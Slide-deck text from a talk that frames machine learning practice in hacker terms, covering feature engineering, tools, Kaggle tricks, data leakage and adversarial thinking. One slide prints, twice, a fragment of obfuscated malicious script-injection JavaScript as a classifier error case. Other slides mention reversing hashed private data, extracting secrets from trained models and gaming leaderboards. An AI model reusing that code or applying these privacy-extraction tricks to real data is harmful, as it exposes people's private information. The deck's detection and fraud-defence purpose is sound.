2
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich
Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank
• Competitive data science fanatic
• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.
• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.
• ML is powerful and easy: “Como toda descoberta científica
dá mais poderes sobre a natureza, ela pode aumentar o bem
ou o mal.” - César Lattes
• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.
acm.org/code-of-ethics
Scope
• This presentation will be all over the place. I don’t know if
you never trained a model before, or are experienced with
ML.
• But I hope this presentation will be interesting for the
hackers, makers, creators of all types.
• Catch me afterwards, if you want to talk about hyper
optimization.
What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch
What is AI?
• AI grew out of Operations Research after WWII
• AI consists of many diverse subfields ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Just replace word `AI` with `Software`: If result
sounds silly or obvious, then the application of AI usually is
too. Power word: “What is your false positive rate?”.
What is Machine Learning?
• Automatically learn from data
• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.
Why Software Is Eating the World (2016, Andreessen Horowitz)
What is Predictive Modeling?
• Puts the focus on creating predictions:
• Use of model,
• how to use the data,
• how to get good accuracy.
• Essential to create a first solution. But the bare minimum to
what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output
• Connectionism: Learn from data bottom-up, not top-down
by stacking learning primitives.
• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.
• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.
• Perhaps we can model functional intelligence with
computers too?
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.
• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning
• Perhaps we can model intelligence with network
architectures too?
Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
• Don’t care if there is a magical deamon or a complex
maths formula in the box.
• Question then becomes: How to transform the data, how
to parametrize the black box, so to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used
• Text and Sound and Images are unstructured
• Data can be temporal, for instance: time-series
• Rarely, data is in shape of a graph (for instance, relations
between gang members)
Feature Engineering
• Most data needs to be converted to numbers first
• Feature engineering:
Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Feature Engineering
• Most data needs to be converted to numbers first
• Feature engineering:
• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.
Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables
• One-hot encoding for neural nets:
• Label encoding for decision trees:
Red
Green
Blue
1
2
3
Red
Green
Blue
Red Green Blue
1 0 0
0 1 0
0 0 1
Feature Engineering: Tricks
• That’s really (mostly) it!
• You can now apply the most advanced machine learning
algorithms to data and something you want to predict.
• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).
Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Modeling
Gender Likes Open Source? Wants RoadSec ticket?
0 1 ?
• Gender did not show any correlation and 3/4 of people
who Likes Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
Modeling
• What model do you use for data?
• Tabular data: Gradient boosted decision trees (XGBoost)
• Images: Pre-trained deep neural net (or Detectron)
• Text: TFIDF -> Logistic Regression (or FastText, ULMNet,
BERT)
Search for above terms in combination with “machine learning”
Optimization
• A Python classifier may look like:
FactorizationMachineBinaryClassifier(iters=5,
learning_rate=0.1, latent_dim=20, radius=0.5,
lambda_linear=0.0001, lambda_latent=0.0001,
normalize='Auto', norm=True, caching='Auto',
shuffle=True, verbose=True)
Trick is to tweak these parameters to get a better evaluation.
Then stop when any change makes evaluation worse.
Brute Forcing
• View hyper parameter optimization as a password
cracking task
• Enumerate or randomly try all possible parameters within a
range.
• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.
• This is basically Random Search or Adaptive Search
Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?
• How about trying every possible combination of weights
and pick the best evaluation? Worst case: you spend 2
hours more compute.
KazAnova@kaggle
Brute Forcing
• Do we really need to manually train all these models?
• What would happen if we automatically train a 1000
random models with random data transformations and
throw them all into another black box?
• Out comes a winning Kaggle submission…
Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set.
• For every column in test set:
• randomly shuffle the column
• Evaluate the new predictions
• If evaluation is better with randomly shuffled features,
then you can safely discard the column.
Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easy-replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?
Warez
• Good tools:
• allow you to experiment and iterate quickly
• have an active community contributing new features
• can be applied to many different problems with similar
results.
• abstract away complexity.
Python
• Grown to be essential to data science and machine
learning.
• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code
PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
Python
from sklearn import datasets, ensemble
iris = datasets.load_iris()
X = iris.data
y = iris.target
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)
Scikit-Learn
• The Metasploit of Machine Learning
• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)
• Could get by for a while learning only this library very well
Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data:
• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API
• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
Keras
User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.
• Alternatives: PyTorch with Fast.AI library
Deep Learning with Python (Chollet, 2017)
Vowpal Wabbit
• Very fast online learning on data bigger than memory
Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom filter
• Support for contextual bandits (automated decision
making)
• Eat raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas
• Fast, scalable and supports many types of data
• Perform vector operations on NumPy (or Numba) arrays
• Wide support for scientific calculations
Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.
• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF
• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
State:New_York
Tricks as seen on the Kaggle forums
Reverse Engineering
• Use model predictions to reverse engineer the training
data.
• Simple brute-force can use fitted language models to
retrieve:
• Credit Card Numbers
• Social Security Numbers / CPF’s
• if it has seen this before once (DL is good at
memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You can not survive in most business
with just predictive modeling.
• Companies don’t hire an AutoML
solution, they hire people.
• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How to gain access to online data science community?
• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials/step-by-step’s.
• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor
• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show not tell: Save your most powerful models ‘till the
very last
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?
• Wacky Boosting:
• Keep changing your submission
• use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1
• Will horribly overfit, but can also cause others to overfit!
Competing in a data science contest without reading the data (2015, Hardt)
Information Snooping
• Normally not advisable to use the test set. But for
competitions the test is available, so:
• Can use semi-supervised learning to extract information
from the test set. Use test set for:
• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.
• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature.
• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!
• Local evaluation is your lifeline.
• Try everything, keep the good.
• Once I got an accuracy of 181% by
submitting correct answers twice.
Statisticians
Machine Learners
Smart
Machine Learner
(The joke is that there are only smart statisticians)
CV
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at finding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You can not use data that is not reasonably available at
test time (or your lifeline evaluation can not be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: The more powerful your model, the bigger chance
for exploiting any leakage left that you did not find.
• Most powerful model is a 1000 data scientists on a
typewriter, so that’s why competitions see larger leakage
discovery.
• A large sample of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of Microsoft malware binary classification 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running,
essential for iteration speed:
• Can spot very fast if some change was good or bad.
• Feels like NEO in the Matrix if you do this with the data
itself during data reading.
• Can spot data health issues (text encoding errors, all
missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• Below sample confidently predicted as minified JS when it
was actually obfuscated malicious JS:
4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters
4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:
• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonimize users and obtain the ground truth.
• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.
Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter firing missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.
• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible or
more patient?
• Do you memorize your victim’s personal details?
Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check for how long user spend in funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
Botnet
• Much of commercial ML can or is being automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “A ciência não pode prever o que vai acontecer. Só pode
prever a probabilidade de algo acontecer.” - César Lattes
• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)
• No knowledge of particle physics is required.
• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Lets hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick best log loss model and lower the learning rate and
use early stopping to find the best amount of trees.
• Repeat above 3 times and average results
Position: 30/1785
Further Learning
• MOOC’s: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science Coursera, Abu-Mustafa Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find cool professor and study their online output